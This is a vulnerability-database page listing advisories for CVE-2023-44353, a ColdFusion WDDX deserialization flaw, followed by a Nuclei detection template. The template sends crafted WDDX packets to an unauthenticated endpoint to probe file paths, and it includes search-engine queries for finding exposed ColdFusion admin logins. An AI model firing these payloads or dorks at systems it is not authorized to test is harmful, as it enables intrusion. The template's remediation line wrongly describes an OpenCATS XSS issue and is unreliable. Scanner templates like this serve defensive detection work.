| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the ColdFusion software platform, related to the restoration of unreliable data in memory, allows a hacker to execute arbitrary code. | 23 Nov 202300:00 | – | bdu_fstec | |
| CVE-2023-44353 | 26 Nov 202306:17 | – | circl | |
| Adobe ColdFusion 安全漏洞 | 17 Nov 202300:00 | – | cnnvd | |
| Adobe ColdFusion Code Execution Vulnerability (CNVD-2023-100310) | 21 Nov 202300:00 | – | cnvd | |
| Adobe ColdFusion < 2021.x < 2021u12 / 2023.x < 2023u6 Multiple Vulnerabilities (APSB23-52) | 15 Nov 202300:00 | – | nessus | |
| Adobe ColdFusion < 2021 Update 12 / < 2023 Update 6 Remote Code Execution | 25 Mar 202400:00 | – | nessus | |
| CVE-2023-44353 | 17 Nov 202313:31 | – | cve | |
| CVE-2023-44353 ColdFusion WDDX Deserialization Gadgets | 17 Nov 202313:31 | – | cvelist | |
| Vulnerabilities fixed in Adobe Coldfusion | 16 Nov 202300:00 | – | ncsc | |
| CVE-2023-44353 | 17 Nov 202314:15 | – | nvd |
id: CVE-2023-44353
info:
name: Adobe ColdFusion WDDX Deserialization Gadgets
author: salts
severity: critical
description: |
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
impact: |
Unauthenticated attackers can exploit WDDX deserialization vulnerabilities in Adobe ColdFusion to execute arbitrary code without user interaction and completely compromise ColdFusion installations.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
- https://github.com/JC175/CVE-2023-44353-Nuclei-Template
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-44353
cwe-id: CWE-502
epss-score: 0.80178
epss-percentile: 0.9957
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: adobe
product: coldfusion
shodan-query:
- http.component:"Adobe ColdFusion"
- http.component:"adobe coldfusion"
- http.title:"coldfusion administrator login"
- cpe:"cpe:2.3:a:adobe:coldfusion"
fofa-query:
- title="coldfusion administrator login"
- app="adobe-coldfusion"
google-query: intitle:"coldfusion administrator login"
tags: cve2023,cve,adobe,coldfusion,deserialization,xss,vuln,vkev
variables:
windows_known_path: "C:\\Windows\\"
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
linux_known_path: "/etc/"
linux_bad_path: "/thesecretcowlevelisreal/"
http:
- raw:
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
matchers-condition: or
matchers:
- type: dsl
name: windows
dsl:
- "status_code_1 == 500 && status_code_2 == 404"
- contains(body_1, "coldfusion.runtime")
condition: and
- type: dsl
name: linux
dsl:
- "status_code_3 == 500 && status_code_4 == 404"
- contains(body_3, "coldfusion.runtime")
condition: and
# digest: 4a0a0047304502201664f726822d082f806115cd33ef6090576ac4993dee7791315f9a10bd0421d8022100a9b1f9c3a8571584482110518f69d9bd004ddf2b6056a762c5c8bda71f0877e5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation